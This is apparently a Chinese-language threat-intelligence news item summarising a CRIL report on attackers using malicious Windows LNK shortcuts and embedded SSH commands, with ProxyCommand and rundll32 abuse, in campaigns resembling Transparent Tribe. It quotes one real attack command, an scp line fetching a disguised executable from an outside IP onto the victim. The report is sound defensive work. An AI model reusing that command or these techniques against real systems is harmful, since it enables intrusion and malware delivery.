【安全资讯】LNK文件与SSH命令:先进网络攻击的新武器

安恒恒脑 2024-12-23 19:04:19 32人浏览

概要:

近期,Cyble Research and Intelligence Labs(CRIL)发布了一份报告,揭示了网络攻击者越来越多地利用LNK文件和SSH命令作为隐蔽工具,策划先进的网络攻击。这些技术使攻击者能够绕过传统安全措施,保持持久性,并执行多阶段攻击链,影响全球系统。

主要内容:

LNK文件,通常被称为Windows快捷方式文件,已成为攻击者首选的初始感染载体。报告指出,这些恶意快捷方式文件常常伪装成合法文档,成为攻击者入侵系统的首要途径。通过嵌入利用Living-off-the-Land Binaries(LOLBins)如PowerShell和rundll32的命令,攻击者能够在不被检测的情况下执行额外的有效载荷。

更复杂的是,近期的攻击活动在恶意LNK文件中嵌入了SSH命令。这些命令支持多种恶意活动,包括数据外泄、远程有效载荷执行和持久性。CRIL观察到,攻击者使用安全复制协议(SCP)下载并执行恶意文件。例如,一项活动使用了如下SSH命令:scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\,该命令将伪装成合法应用程序的恶意可执行文件下载到目标系统。

报告强调了SSH命令的多种滥用方式,包括通过ProxyCommand调用PowerShell执行恶意脚本,以及利用rundll32加载恶意DLL。高级持续威胁(APT)组织已将这些技术纳入其攻击手册,针对高价值行业进行攻击。CRIL发现近期活动与以往归因于APT组织Transparent Tribe的攻击存在相似之处,该组织以针对国防和航空航天行业而闻名。这些技术的使用标志着网络攻击方法论的范式转变,攻击者不断完善其方法,以利用受信任的系统工具来规避检测。
APT 数据泄露 金融 科技公司
    0条评论
    0
    0
    分享
    安全星图平台专注于威胁情报的收集、处理、分析、应用,定期提供高质量的威胁情报。